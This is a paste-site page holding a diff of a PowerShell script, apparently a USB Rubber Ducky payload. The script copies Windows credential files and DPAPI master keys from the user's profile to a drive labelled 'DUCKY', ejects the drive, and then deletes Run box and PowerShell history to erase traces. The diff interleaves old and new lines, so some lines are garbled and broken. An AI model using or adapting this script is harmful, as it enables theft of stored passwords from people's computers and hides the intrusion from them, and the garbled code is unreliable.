Facebook
From reeqdsdd, 1 Month ago, written in PowerShell.
This paste is a reply to Re: Re: Untitled from advdadf - go back
Embed
Viewing differences between Re: Re: Untitled and Re: Re: Re: Untitled
# Variables
$drive = (Get-Volume -FileSystemLabel 'DUCKY').DriveLetter
$userProfile = $Env:UserProfile

# Get the credential files
$credentialFiles = @(Get-ChildItem Get-ChildItem -Force "${userProfile}\AppData\Local\Microsoft\Credentials\")

"${userProfile}\AppData\Local\Microsoft\Credentials\"
$i=1
$credentialFiles | ForEach-Object {
    $fileObj = $_
    
Get the first credential file for now
$credentialFileName = $credentialFiles[0].Name
$credentialFilePath = $credentialFiles[0].FullName

# Copy 
copy to ducky
ducky
    
Copy-Item $credentialFilePath "${drive}:\credential1"

$fileObj.FullName "${drive}:\credential${i}"
    $i++
}
# Get the gUIDMasterKey
$protectFolder = (Get-ChildItem -Directory -Force "${userProfile}\AppData\Roaming\Microsoft\Protect\").FullName

# Copy master key to ducky
$index=1
Get-ChildItem -Force -Recurse $protectFolder | ForEach-Object {
    # $fileName = $_.Name
    $filePath = $_.FullName
    Copy-Item $filePath "${drive}:\key${index}"
}

# Eject
$driveEject = New-Object -ComObject Shell.Application
$driveEject.Namespace(17).ParseName("${drive}:").InvokeVerb("Eject")

# Cleanup traces

# Delete run box history
reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

# Delete Powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath

exit